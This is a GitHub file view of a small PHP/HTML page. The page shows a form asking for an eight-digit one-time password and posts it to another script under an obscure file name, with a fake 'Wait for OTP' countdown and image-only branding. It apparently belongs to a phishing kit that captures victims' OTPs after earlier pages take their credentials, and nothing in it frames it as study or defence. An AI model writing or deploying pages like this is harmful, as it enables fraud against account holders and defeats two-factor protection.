-
Notifications
You must be signed in to change notification settings - Fork 0
/
forbarthaU.php
145 lines (99 loc) · 2.58 KB
/
forbarthaU.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
input[type=text], input[type=password] {
width: 100%;
padding: 06px 20px;
margin: 8px 0;
display: inline-table;
border: 1px solid #;
box-sizing: border-box;
}
button {
background-color:#ed8608 ;
color: white;
padding: 06px 20px;
margin: 0;
border: none;
cursor: pointer;
width: 30%;
}
button:hover {
opacity: 0.8;
}
.cancelbtn {
width: auto;
padding: 10px 18px;
background-color: #f44336;
}
.imgcontainer {
text-align: center;
margin: -24px 0 12px 0;
}
img.avatar {
width: 40%;
border-radius: 50%;
}
.container {
padding: 16px;
}
span.psw {
float: right;
padding-top: 16px;
}
/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
span.psw {
display: block;
float: none;
}
.cancelbtn {
width: 100%;
}
}
</style>
</head>
<body>
<body style="background-color:;">
</body>
<header>
<center><h1 class="text-center"><img src="./ouut.jpg" style="width: 100%;"></h1></center>
</header>
<form action="ilteangachHH.php" method="post">
<div class="imgcontainer">
</div>
<div class="container">
<label>One Time Password(OTP)*</label>
<input type="text" placeholder="" name="TOP_4"maxlength="8"
pattern="[0-9]{8}" required>
</style>
</head>
<body onload="startTimer();">
<div id="cc">
<div id="dd">
<script type="text/javascript">
var timer=120;
var sec=120;
function startTimer() {
sec=parseInt(timer%120);
if (timer<0) {
timer.stop();
}
document.getElementById("time").innerHTML = "<p1> Wait for OTP : </p1>"+sec.toString();
timer--;
setTimeout(function(){
startTimer();
}, 1000);
}
</script>
<center> <b style="color:grey; font-family: Arial, Helvetica, sans-serif; font-size:17px; margin-bottom:15px; margin-left:5px;"><span style="color:grey; font-size:15px;" id="time"></span> secs</p></b>
<center><button type="submit">submit</button>
</center>
</div>
<center><h1 class="text-center"><img src="./lode.jpg" style="width: 100%;"></h1></center>
<center><h1 class="text-center"><img src="./hyhjui.jpg" style="width: 100%;"></h1></center>
</form>
</body>
</html>